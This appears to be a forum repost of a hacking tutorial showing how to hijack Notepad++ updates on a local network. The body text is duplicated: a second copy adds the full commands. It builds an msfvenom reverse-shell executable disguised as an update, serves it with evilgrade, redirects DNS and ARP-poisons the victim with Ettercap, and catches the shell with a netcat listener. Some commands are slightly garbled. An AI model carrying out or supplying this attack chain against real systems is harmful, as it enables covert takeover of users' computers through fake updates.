- 25 Nis 2020
- 19
- 0
MitM Attacks: Hijacking Software Updates with evilgrade
In this tutorial, we will examine what happens if that update or upgrade is hijacked by a malicious entity. All of our systems, periodically download upgrades and updates trusting that these are coming from the software developer. What if they were not? What if these updates/upgrades were coming from a malicious source?
Two of the most infamous cyber warfare attacks thus far, relied upon this weakness in our systems. The infamous Stuxnet worm relied upon the driver signature of Realtek and Jmicro to install updates directly into the kernel, unbeknownst to the user. As these were legitimate signatures, the system accepted them without question. In another example, the NSA was able to use Microsoft security updates to install malicious software on their enemy's system by generating a collision hash of the Microsoft digital signature, thereby enabling them to install malicious software. Both of these are examples of the weakness of the digital certificate method of signing updates/upgrades, even under the best of circumstances.
In this tutorial, we will be using a piece of software known as evilgrade to hijack and upgrade/updates from a number of different pieces of software. Note that isr-evilgrade, as presently developed, is limited to a small number of software updates and upgrades.
One final note, this is a moderate to advanced hack. It requires significant system knowledge, hacking knowledge and patience. We will be using several hacking tools in tandem, including netcat, ****sploit, Ettercap and evilgrade.
Step 1: Open a Terminal and start evilgrade
isr-evilgrade was built into some of the earlier versions Kali, but is NOT included in some of the most recent versions. If your version does not include evilgrade, it is in the Kali repository, so you can download and install by entering;
Once it has completed it download and install, simply enter;
As you can see, evilgrade starts by loading all of its 63 modules. Each module represents a software application that evilgrade can hijack its updates/upgrades. To see all the modules, we can type;
In this lesson, we will be hijacking the update to Notepad++, so we need to configure evilgrade to use that module.
Once we have loaded this module, let's take a look at the options for this module.
Please note the VirtualHost line. We will be using that in our DNS setup to hijack the update.
Step 2: Generate Payload in ****sploit
In this case, we will be simply creating a payload (in ****sploit terms that is a malicious program that we place on the victim to give us control) to install it in place of the update. If you are unfamiliar with ****sploit, check out my ****sploit Basics series here at Hackers-Arise.
This command puts that payload into a Windows .exe file with the name notepadplus_update.exe. First, we need to create the directory to hold the file. Open a terminal and type;
Then type;
Now that we have created the payload, we need to tell evilgrade where it is and to use it as the agent in this update.
Next , we start the server
Step 3: Download and Install Notepad+
Now, let's download and install Notepad++ .
When it done downloading and installed, it opens a screen like that below.
Step 4: Setting Up our MiTM
Now that we have evilgrade all set up, we need to set up our MiTM attack. We will be using Ettercap for this purpose.
We will be using Ettercap to redirect DNS queries. The first step is to open the etter.dns file in Ettercap with the text editor of your choice, but I will be using Leafpad here. You can use any text editor that suits your needs.
In this text ********, add the following line. Remember, this was the address of the VirtualHost that evilgrade gave us previously.
notepad-plus.sourceforge.net A 192.168.1.106
Now, let's start Ettercap in graphical mode.
To get Ettercap started, Click Sniff -->Unified Sniffing
The next step is that we need to activate the dns_spoof plugin in Ettercap. Click on Plugins -->Manage Plugins -->dns_spoof
Next, Scan for hosts. Click Hosts --> scan hosts.
When Ettercap is done scanning for hosts, Click Hosts --> Hosts list. This will open a window like below. Your may have more or less hosts with different IP addresses.
Now, place ourselves between the router (192.168.1.103) selecting it as Target 1 and the victim (192.168.1.118), selecting it as Target 2. Your IP addresses may be different.
Next, we need to ARP poison to place ourselves in the middle. Click Mitm --> Arp poisoning
Select "Sniff Remote connections".
Next, Click Start --> Start Sniffing
Step 5: Set Up a Netcat Listener
Now that we have ourselves between our victim and the router, all their traffic will be going through our system. Our next step, is to set up a netcat listener on our attack system. This will open a listener on a specific port to receive a connection from our victim machine. Remember that the payload we created was using our IP address and port 6996. The listener must use that same port number.
Now, when the user opens Notepad++, they will be greeted with prompt like that below asking whether they want to download the updates.
When the user clicks, "Yes", it will update from our server and place our agent into Notepad++ instead of the update. The payload we created will then connect back to our netcat listener opening a shell on the victim's system!
Although this attack is limited to those software developers that do not use digital certificates for authentication, it should provide you with insights into one more way to compromise a system. As I stated above, this exact attack has been used with stolen certificates and with hash collisions of legitimate digital certificates by nation states.
In this tutorial, we will examine what happens if that update or upgrade is hijacked by a malicious entity. All of our systems, periodically download upgrades and updates trusting that these are coming from the software developer. What if they were not? What if these updates/upgrades were coming from a malicious source?
Two of the most infamous cyber warfare attacks thus far, relied upon this weakness in our systems. The infamous Stuxnet worm relied upon the driver signature of Realtek and Jmicro to install updates directly into the kernel, unbeknownst to the user. As these were legitimate signatures, the system accepted them without question. In another example, the NSA was able to use Microsoft security updates to install malicious software on their enemy's system by generating a collision hash of the Microsoft digital signature, thereby enabling them to install malicious software. Both of these are examples of the weakness of the digital certificate method of signing updates/upgrades, even under the best of circumstances.
In this tutorial, we will be using a piece of software known as evilgrade to hijack and upgrade/updates from a number of different pieces of software. Note that isr-evilgrade, as presently developed, is limited to a small number of software updates and upgrades.
One final note, this is a moderate to advanced hack. It requires significant system knowledge, hacking knowledge and patience. We will be using several hacking tools in tandem, including netcat, ****sploit, Ettercap and evilgrade.
Step 1: Open a Terminal and start evilgrade
isr-evilgrade was built into some of the earlier versions Kali, but is NOT included in some of the most recent versions. If your version does not include evilgrade, it is in the Kali repository, so you can download and install by entering;
Kod:
kali > apt-get isr-evilgrade installOnce it has completed it download and install, simply enter;
Kod:
kali > evilgradeAs you can see, evilgrade starts by loading all of its 63 modules. Each module represents a software application that evilgrade can hijack its updates/upgrades. To see all the modules, we can type;
Kod:
kali > show modulesIn this lesson, we will be hijacking the update to Notepad++, so we need to configure evilgrade to use that module.
Kod:
evilgrade > configure notepadplusOnce we have loaded this module, let's take a look at the options for this module.
Kod:
kali > show optionsPlease note the VirtualHost line. We will be using that in our DNS setup to hijack the update.
Step 2: Generate Payload in ****sploit
In this case, we will be simply creating a payload (in ****sploit terms that is a malicious program that we place on the victim to give us control) to install it in place of the update. If you are unfamiliar with ****sploit, check out my ****sploit Basics series here at Hackers-Arise.
This command puts that payload into a Windows .exe file with the name notepadplus_update.exe. First, we need to create the directory to hold the file. Open a terminal and type;
Kod:
kali > mkdir /root/evilgradeThen type;
Kod:
kali > msfvenom windows/shell_reverse_tcp LHOST 192.168.1.118 LPORT=6996
X > /root/evigrade/notepadplus_update.exeNow that we have created the payload, we need to tell evilgrade where it is and to use it as the agent in this update.
Kod:
evilgrade(notepadplus) > set agent /root/evilgrade/notepadplus_update.exeNext , we start the server
Kod:
evilgrade (notepadplus) > startStep 3: Download and Install Notepad+
Now, let's download and install Notepad++ .
When it done downloading and installed, it opens a screen like that below.
Step 4: Setting Up our MiTM
Now that we have evilgrade all set up, we need to set up our MiTM attack. We will be using Ettercap for this purpose.
We will be using Ettercap to redirect DNS queries. The first step is to open the etter.dns file in Ettercap with the text editor of your choice, but I will be using Leafpad here. You can use any text editor that suits your needs.
Kod:
kali > leafpad /etc/ettercap/etter.dnsIn this text ********, add the following line. Remember, this was the address of the VirtualHost that evilgrade gave us previously.
notepad-plus.sourceforge.net A 192.168.1.106
Now, let's start Ettercap in graphical mode.
Kod:
kali > ettercap -GTo get Ettercap started, Click Sniff -->Unified Sniffing
The next step is that we need to activate the dns_spoof plugin in Ettercap. Click on Plugins -->Manage Plugins -->dns_spoof
Next, Scan for hosts. Click Hosts --> scan hosts.
When Ettercap is done scanning for hosts, Click Hosts --> Hosts list. This will open a window like below. Your may have more or less hosts with different IP addresses.
Now, place ourselves between the router (192.168.1.103) selecting it as Target 1 and the victim (192.168.1.118), selecting it as Target 2. Your IP addresses may be different.
Next, we need to ARP poison to place ourselves in the middle. Click Mitm --> Arp poisoning
Select "Sniff Remote connections".
Next, Click Start --> Start Sniffing
Step 5: Set Up a Netcat Listener
Now that we have ourselves between our victim and the router, all their traffic will be going through our system. Our next step, is to set up a netcat listener on our attack system. This will open a listener on a specific port to receive a connection from our victim machine. Remember that the payload we created was using our IP address and port 6996. The listener must use that same port number.
Kod:
kali >nc -l -p 6996Now, when the user opens Notepad++, they will be greeted with prompt like that below asking whether they want to download the updates.
When the user clicks, "Yes", it will update from our server and place our agent into Notepad++ instead of the update. The payload we created will then connect back to our netcat listener opening a shell on the victim's system!
Although this attack is limited to those software developers that do not use digital certificates for authentication, it should provide you with insights into one more way to compromise a system. As I stated above, this exact attack has been used with stolen certificates and with hash collisions of legitimate digital certificates by nation states.
Source: https://www.hackers-arise.com/post/2017/10/11/mitm-attacks-hijacking-software-updates-with-evilgrade
Turkish version: https://www.turkhackteam.org/siber-...-ile-yazilim-guncellemelerini-hijackleme.html
Turkish version: https://www.turkhackteam.org/siber-...-ile-yazilim-guncellemelerini-hijackleme.html
Moderatör tarafında düzenlendi:
